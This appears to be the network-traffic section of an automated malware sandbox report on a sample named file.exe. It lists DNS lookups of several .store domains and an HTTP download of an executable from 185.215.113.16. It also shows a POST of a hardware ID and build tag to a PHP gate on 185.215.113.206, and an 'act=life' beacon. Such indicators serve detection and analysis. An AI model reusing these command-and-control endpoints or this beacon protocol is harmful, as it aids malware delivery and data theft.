Nov 8, 2024 15:20:55.875061989 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.875075102 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.875098944 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.875119925 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.875148058 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.875159025 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.875164986 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.875174999 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.875186920 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.875194073 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.875197887 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.875220060 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.875235081 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.892071009 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.892082930 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.892093897 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.892105103 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.892117023 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.892127037 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.892138004 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.892139912 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.892159939 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.892163038 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.892172098 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.892184019 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.892194986 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.892201900 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.892208099 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.892222881 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.892260075 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.915482044 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.915549994 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.915596962 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.915643930 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.915694952 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.915712118 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.915728092 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.915739059 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.915772915 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.915783882 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.915818930 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.915833950 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.915873051 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.915899992 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.915911913 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.915924072 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.915934086 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.915955067 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.915986061 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.916102886 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.916115046 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.916125059 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.916136980 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.916148901 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.916176081 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.916358948 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.916376114 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.916387081 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.916397095 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.916407108 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.916410923 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.916423082 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.916446924 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.916467905 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.916488886 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.916593075 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.916630030 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.917171001 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917217970 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.917236090 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917247057 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917290926 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917299986 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.917301893 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917334080 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917341948 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.917378902 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917433023 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917435884 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.917445898 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917459011 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917483091 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917493105 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.917527914 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.917612076 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917623043 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917660952 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917661905 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.917680979 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917735100 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.917742968 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917777061 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917787075 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917815924 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.917898893 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917912006 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917946100 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917953968 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.917958021 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917969942 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.917994976 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.918009043 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.918142080 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.918155909 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.918190002 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.918201923 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.918205023 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.918214083 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.918226957 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.918250084 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.918278933 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.951447010 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.951498985 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.951513052 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.951534986 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.951559067 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.951575994 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.951585054 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.951587915 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.951598883 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.951611996 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.951622009 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.951644897 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.951666117 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.952325106 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.952955961 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.953011036 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:57.674031019 CET	49844	80	192.168.2.9	185.215.113.206
Nov 8, 2024 15:20:57.679164886 CET	80	49844	185.215.113.206	192.168.2.9
Nov 8, 2024 15:20:57.679234028 CET	49844	80	192.168.2.9	185.215.113.206
Nov 8, 2024 15:20:57.679498911 CET	49844	80	192.168.2.9	185.215.113.206
Nov 8, 2024 15:20:57.684446096 CET	80	49844	185.215.113.206	192.168.2.9
Nov 8, 2024 15:20:58.591212034 CET	80	49844	185.215.113.206	192.168.2.9
Nov 8, 2024 15:20:58.591268063 CET	49844	80	192.168.2.9	185.215.113.206
Nov 8, 2024 15:20:58.644800901 CET	49844	80	192.168.2.9	185.215.113.206
Nov 8, 2024 15:20:58.649750948 CET	80	49844	185.215.113.206	192.168.2.9
Nov 8, 2024 15:20:58.927570105 CET	80	49844	185.215.113.206	192.168.2.9
Nov 8, 2024 15:20:58.927778006 CET	49844	80	192.168.2.9	185.215.113.206
Nov 8, 2024 15:21:04.087445974 CET	80	49844	185.215.113.206	192.168.2.9
Nov 8, 2024 15:21:04.087801933 CET	49844	80	192.168.2.9	185.215.113.206
Nov 8, 2024 15:21:04.323888063 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:21:04.324290037 CET	49844	80	192.168.2.9	185.215.113.206

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 8, 2024 15:20:35.396250963 CET	58084	53	192.168.2.9	1.1.1.1
Nov 8, 2024 15:20:35.418608904 CET	53	58084	1.1.1.1	192.168.2.9
Nov 8, 2024 15:20:35.423924923 CET	62739	53	192.168.2.9	1.1.1.1
Nov 8, 2024 15:20:35.454250097 CET	53	62739	1.1.1.1	192.168.2.9
Nov 8, 2024 15:20:35.455933094 CET	52384	53	192.168.2.9	1.1.1.1
Nov 8, 2024 15:20:35.478879929 CET	53	52384	1.1.1.1	192.168.2.9
Nov 8, 2024 15:20:35.480837107 CET	61606	53	192.168.2.9	1.1.1.1
Nov 8, 2024 15:20:35.503854990 CET	53	61606	1.1.1.1	192.168.2.9
Nov 8, 2024 15:20:35.505178928 CET	59057	53	192.168.2.9	1.1.1.1
Nov 8, 2024 15:20:35.527057886 CET	53	59057	1.1.1.1	192.168.2.9
Nov 8, 2024 15:20:35.530445099 CET	49464	53	192.168.2.9	1.1.1.1
Nov 8, 2024 15:20:35.552470922 CET	53	49464	1.1.1.1	192.168.2.9
Nov 8, 2024 15:20:35.553916931 CET	53505	53	192.168.2.9	1.1.1.1
Nov 8, 2024 15:20:35.593338966 CET	53	53505	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 8, 2024 15:20:35.396250963 CET	192.168.2.9	1.1.1.1	0x828d	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 8, 2024 15:20:35.423924923 CET	192.168.2.9	1.1.1.1	0x828e	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 8, 2024 15:20:35.455933094 CET	192.168.2.9	1.1.1.1	0x6de4	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 8, 2024 15:20:35.480837107 CET	192.168.2.9	1.1.1.1	0xe510	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 8, 2024 15:20:35.505178928 CET	192.168.2.9	1.1.1.1	0x86	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 8, 2024 15:20:35.530445099 CET	192.168.2.9	1.1.1.1	0x2707	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 8, 2024 15:20:35.553916931 CET	192.168.2.9	1.1.1.1	0xd18c	Standard query (0)	navygenerayk.store	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 8, 2024 15:20:31.170830965 CET	1.1.1.1	192.168.2.9	0x3b2c	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	azurefd-t-fb-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 8, 2024 15:20:31.170830965 CET	1.1.1.1	192.168.2.9	0x3b2c	No error (0)	dual.s-part-0017.t-0009.fb-t-msedge.net	s-part-0017.t-0009.fb-t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 8, 2024 15:20:31.170830965 CET	1.1.1.1	192.168.2.9	0x3b2c	No error (0)	s-part-0017.t-0009.fb-t-msedge.net		13.107.253.45	A (IP address)	IN (0x0001)	false
Nov 8, 2024 15:20:35.418608904 CET	1.1.1.1	192.168.2.9	0x828d	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 8, 2024 15:20:35.454250097 CET	1.1.1.1	192.168.2.9	0x828e	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 8, 2024 15:20:35.478879929 CET	1.1.1.1	192.168.2.9	0x6de4	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 8, 2024 15:20:35.503854990 CET	1.1.1.1	192.168.2.9	0xe510	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 8, 2024 15:20:35.527057886 CET	1.1.1.1	192.168.2.9	0x86	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 8, 2024 15:20:35.552470922 CET	1.1.1.1	192.168.2.9	0x2707	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false
Nov 8, 2024 15:20:35.593338966 CET	1.1.1.1	192.168.2.9	0xd18c	No error (0)	navygenerayk.store		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 8, 2024 15:20:35.593338966 CET	1.1.1.1	192.168.2.9	0xd18c	No error (0)	navygenerayk.store		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

navygenerayk.store

185.215.113.16

185.215.113.206

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49800	185.215.113.16	80	7508	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 15:20:49.644229889 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 8, 2024 15:20:50.574942112 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 08 Nov 2024 14:20:50 GMT Content-Type: application/octet-stream Content-Length: 2125312 Last-Modified: Fri, 08 Nov 2024 14:04:33 GMT Connection: keep-alive ETag: "672e1a71-206e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 60 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 72 00 00 04 00 00 fe ec 20 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng,`r@r @P.d. p.v@.rsrc .@.idata .@ ).@uikmugxwX@mucpsfolPrH @.taggant0`r"L @
Nov 8, 2024 15:20:50.574979067 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 8, 2024 15:20:50.574990034 CET	424	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 8, 2024 15:20:50.575001001 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 8, 2024 15:20:50.575035095 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: q+,";
Nov 8, 2024 15:20:50.575047016 CET	24	IN	Data Raw: 02 2e 86 e2 89 e5 84 e5 c6 72 fd 33 e0 73 78 60 1a 3c 4a c6 e2 38 75 46 Data Ascii: .r3sx`<J8uF
Nov 8, 2024 15:20:50.575067043 CET	1236	IN	Data Raw: 9c d1 a1 44 7e 0a 06 f3 81 9d de 38 c5 6f 6c 37 2f 16 4b 2d 88 7a 8f 90 d0 90 81 f6 fa 36 7c 0f 0c 71 80 c5 d1 f3 ae 0c 3a f6 d2 2c a5 73 56 9a f7 0c af 66 c4 95 ba fe e9 85 8a bd 13 81 ad 64 b6 d5 b9 fe aa 91 54 1d ea 99 31 cb b8 be 29 f5 c1 f6 Data Ascii: D~8ol7/K-z6\|q:,sVfdT1)v]oY?b3fFSf.}F: h<ehH,d~+vQy9\|`R(=Od8]bL;uAY+ztHD^S-\|5aOD2
Nov 8, 2024 15:20:50.575079918 CET	1236	IN	Data Raw: a8 7e 77 90 2e be 3c e0 06 b2 1f f6 c4 fa 6f 1e 10 c6 ba 5d 97 1f fc 5f f8 19 cd ee 20 07 89 1e a4 7e 53 dd 48 77 cd ec 99 18 7a 66 03 59 7a 36 2e 68 d3 19 93 f5 e9 51 92 d9 ea fc 42 20 3c 47 cd d1 6b 0e 7e f3 33 3c 92 af aa f2 32 c3 78 e0 c5 88 Data Ascii: ~w.<o]_ ~SHwzfYz6.hQB <Gk~3<2xP_PY*,O)YStqB[Haezj@s~'e1[.nQ\.)@d_T{\xTJrH)Cs}
Nov 8, 2024 15:20:50.575084925 CET	1236	IN	Data Raw: a5 8d 71 f5 26 55 c6 b4 f1 99 0a f6 b7 79 f7 6a c2 19 8e fc 23 91 82 1e ec 94 de 65 20 db 02 4e 10 b8 82 a4 c4 cd db fc 10 d5 19 e5 3b f5 b0 1f fe f5 df ef c1 39 8b b8 91 9b 48 81 c5 36 5a e5 98 6d ae ed f0 05 d6 2d b2 79 90 ef 9b 1d ae d4 99 d3 Data Ascii: q&Uyj#e N;9H6Zm-yVzHI.%zJV3 Qqxk1-W-J9S1UMCau#!KHD=Ql$<X`\H3}A
Nov 8, 2024 15:20:50.575097084 CET	636	IN	Data Raw: 5f b3 cd fb c1 ca 6d f5 c7 93 ee 15 40 79 6b 6c 93 f2 82 48 89 47 a3 80 88 d0 f9 03 01 8a 39 e5 d2 ff 8b d4 eb b9 6f 6c a1 a8 a3 a0 ba 17 83 4d ec 1a e7 1c c2 8a b1 ed a0 8d 35 61 48 d5 b9 20 d8 93 71 15 0c b9 82 3c 04 5e 72 cb c6 7f 92 f0 ca 81 Data Ascii: _m@yklHG9olM5aH q<^rd?9h&t+17T@Q aEhAJy0Mv`u~duyMO4@)fu;2Imd<Y\|
Nov 8, 2024 15:20:50.580012083 CET	1236	IN	Data Raw: 4a 39 83 ec 5b f5 5d e6 e1 85 da 48 14 61 83 4c c4 b0 44 6b db b9 f5 50 90 b5 a8 f8 20 8a 2b f9 03 04 7d f0 a7 8a 8a 14 91 1a 2e 2d ee fd ae 24 21 8a c1 e4 0f ff ab 90 c9 5f 8b 1b a0 8a b0 53 a4 15 5e a2 00 79 82 70 c4 cf db 7c d6 b3 ce 84 88 8a Data Ascii: J9[]HaLDkP +}.-$!_S^yp\|!6 O<aJyq`Vthy1kmgy< Nr;}qr9yj5>L9{81i{x~c@IWX5M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49844	185.215.113.206	80	7508	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 15:20:57.679498911 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 8, 2024 15:20:58.591212034 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 14:20:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 8, 2024 15:20:58.644800901 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDBGHIDGDGHCBGDGCBFI Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 49 44 47 44 47 48 43 42 47 44 47 43 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 45 45 45 44 43 35 33 31 32 36 33 30 35 30 34 35 37 33 35 38 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 49 44 47 44 47 48 43 42 47 44 47 43 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 49 44 47 44 47 48 43 42 47 44 47 43 42 46 49 2d 2d 0d 0a Data Ascii: ------HDBGHIDGDGHCBGDGCBFIContent-Disposition: form-data; name="hwid"40EEEDC531263050457358------HDBGHIDGDGHCBGDGCBFIContent-Disposition: form-data; name="build"tale------HDBGHIDGDGHCBGDGCBFI--
Nov 8, 2024 15:20:58.927570105 CET	210	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 14:20:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49726	188.114.97.3	443	7508	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 14:20:36 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: navygenerayk.store
2024-11-08 14:20:36 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-08 14:20:36 UTC	1015	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 14:20:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q6jgc48drd964ns2s2tls62i4t; expires=Tue, 04-Mar-2025 08:07:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bmub1xzMDn3g14gNp5GpRhckWnZ8zmQGjxkA6BtwdoS2nfvW9pxDny%2Ba7TKa1bB1E%2BWNZIPd5YK1PqcRSyEILl2EWoZovgwOAYQ78Shjf4GuXHMAoqSd%2BxHy%2FbbNaMYgtpTi2XA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df63467ea606bb9-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1023&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=2276729&cwnd=251&unsent_bytes=0&cid=b35e0a774db1dcaa&ts=588&x=0"
2024-11-08 14:20:36 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-08 14:20:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49733	188.114.97.3	443	7508	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
